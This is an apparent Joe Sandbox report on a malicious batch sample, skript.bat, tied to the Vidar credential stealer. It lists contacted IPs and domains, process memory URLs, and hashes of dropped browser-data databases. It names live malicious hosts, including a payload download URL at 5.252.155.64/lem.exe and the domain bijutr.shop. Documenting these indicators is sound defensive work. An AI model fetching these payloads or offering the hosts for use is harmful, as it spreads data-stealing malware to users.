                                                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/3623chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/3625chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/3624chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://t.mInf.com, 0000001A.00000003.2971341246.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971644605.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971377296.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/3862chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000020.00000003.3179742032.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175094763.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3184755862.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175834331.00005B3802EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178580186.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://issuetracker.google.com/issues/166475273chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icochrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_putt.exe, 0000000E.00000003.2512736823.0000000000659000.00000004.00000020.00020000.00000000.sdmp, putt.exe, 0000000E.00000003.2512232759.0000000000659000.00000004.00000020.00020000.00000000.sdmp, putt.exe, 0000000E.00000002.2514229684.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://5.252.155.64/lem.exeUSERPROFILE=C:msedge.exe, 00000022.00000002.3391226276.000058680024C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://msn.com/msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/4384chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/3970chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://policies.google.com/chrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://apis.google.comchrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://bijutr.shop/opInf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://labs.google.com/search?source=ntpchrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://anglebug.com/7604chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://5.252.powershell.exe, 00000009.00000002.2403561813.0000025480182000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://5.252.155.64/lem.exeUSERDOMAIN=ENGchrome.exe, 00000020.00000003.3171987498.0000027410850000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3172472805.0000027410855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://anglebug.com/7761chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3227248252.00005B38030C4000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://5.252.155.tasklist.exe, 00000011.00000002.2545055640.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544304213.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544455277.00000000031EC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://anglebug.com/5901chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://anglebug.com/3965chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 2.16.158.176 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false |
| 149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false |
| 5.252.155.64 | unknown | Russian Federation | 49981 | WORLDSTREAMNL | true |
| 18.165.220.66 | sb.scorecardresearch.com | United States | 3 | MIT-GATEWAYSUS | false |
| 162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 188.245.216.205 | bijutr.shop | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | false |
| 142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 2.16.158.83 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false |

IP
192.168.2.6
127.0.0.1

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1581178
                                                                                                                                                                                                                                Start date and time:2024-12-27 07:08:11 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 8m 34s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:skript.bat
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winBAT@91/168@25/12
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 50%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                                                                                • Number of executed functions: 93
                                                                                                                                                                                                                                • Number of non-executed functions: 290
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .bat
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6716 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7456 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

| Time | Type | Description |
|---|---|---|
| 01:09:09 | API Interceptor | 59x Sleep call for process: powershell.exe modified |
| 01:09:40 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 01:09:44 | API Interceptor | 1x Sleep call for process: putt.exe modified |
| 01:10:27 | API Interceptor | 3x Sleep call for process: Inf.com modified |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 2.16.158.176 | http://elizgallery.com/js.php | malicious | Unknown | |
| 149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico |
| | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/ |
| | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217 |
| | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/ |
| | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl |
| | http://makkko.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegram.dog | malicious | Unknown | telegram.dog/ |
| | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot |
| | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot |
| 5.252.155.64 | script.ps1 | malicious | Vidar | 5.252.155.64/lem.exe |
| 18.165.220.66 | file.exe | malicious | Vidar | |
| | Scan_19112024_people_power_press.pdf | malicious | Unknown | |
| | file.exe | malicious | Amadey, Stealc, Vidar | |
| | remi.exe | malicious | Remcos, PureLog Stealer | |
| | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | |
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                              https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    AKAMAI-ASN1EUlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 23.209.72.40
                                                                                                                                                                                                                                                    z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com | yoda.exe | Get hash | malicious | Vidar | Browse | |
| | lem.exe | Get hash | malicious | Vidar | Browse | |
| | script.ps1 | Get hash | malicious | Vidar | Browse | |
| | installer_1.05_36.4.zip | Get hash | malicious | NetSupport RAT, LummaC, LummaC Stealer | Browse | |
| | Set-up.exe | Get hash | malicious | LummaC | Browse | |
| | Set-up.exe | Get hash | malicious | LummaC Stealer | Browse | |
| | PodcastsTries.exe | Get hash | malicious | Vidar | Browse | |
| | vce exam simulator 2.2.1 crackk.exe | Get hash | malicious | LummaC | Browse | |
| | LVDdWBGnVE.exe | Get hash | malicious | LummaC Stealer | Browse | |
| | eMBO6wS1b5.exe | Get hash | malicious | LummaC Stealer | Browse | |
| C:\Users\user\AppData\Local\Temp\putt.exe | script.ps1 | Get hash | malicious | Vidar | Browse | |
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2676416689747718
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVumw:Kq+n0JX91LyKOMq+8iP5GLP/01
                                                                                                                                                                                                                                                                          MD5:9C72978D62707A972C39A9C1314D4C4C
                                                                                                                                                                                                                                                                          SHA1:18C5BDD0D83CDBF89F1C83C5B0A02376E8F9CF36
                                                                                                                                                                                                                                                                          SHA-256:36AC5B2F92DFD04A55E7AB76FCB5FE6C1641B42861D62B45F88368A9ED6CC67E
                                                                                                                                                                                                                                                                          SHA-512:831EBEE8D45358AEBCFCBD72939116BA5509434E18C640DADF576CC7DEB9C26D2681D74BA42BBA2ABE446EDBC52BD1B670DE462078DA437DA788367CF433A179
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
